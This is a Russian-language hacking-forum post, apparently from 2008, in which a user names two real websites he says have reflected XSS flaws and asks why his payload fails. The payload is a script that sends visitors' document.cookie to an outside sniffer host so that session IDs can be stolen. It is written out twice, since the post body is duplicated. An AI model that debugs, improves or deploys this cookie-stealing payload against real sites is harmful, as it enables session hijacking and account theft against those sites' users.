AARON
02.05.2008, 16:27
Здравствуйте, товарисчи!
Помогите плз разобраться с XSS. Перечитал по инета... Не работает.
Значит проблема такова: нашел я туеву хучу сайтов с пассивными xss. Алерт есть, вроде нихрена не фильтруется...
Вот пару сайтов.
www.pit-pc.ru
www.softoman.ru
Зарегил сниффер на s.netsec.ru. Логин у меня там nick_314
составил соотв. запрос
<script>img = new Image(); img.src = "http://s.netsec.ru/Nick_314.gif?"+document.cookie;</script>
Сам перехожу по ссылке... По идее должен переходить мой sess_id, а вот хрен. Не пашет...
Переводил в char - не приходит... Просвятите ламера, что не так?
Помогите плз разобраться с XSS. Перечитал по инета... Не работает.
Значит проблема такова: нашел я туеву хучу сайтов с пассивными xss. Алерт есть, вроде нихрена не фильтруется...
Вот пару сайтов.
www.pit-pc.ru
www.softoman.ru
Зарегил сниффер на s.netsec.ru. Логин у меня там nick_314
составил соотв. запрос
<script>img = new Image(); img.src = "http://s.netsec.ru/Nick_314.gif?"+document.cookie;</script>
Сам перехожу по ссылке... По идее должен переходить мой sess_id, а вот хрен. Не пашет...
Переводил в char - не приходит... Просвятите ламера, что не так?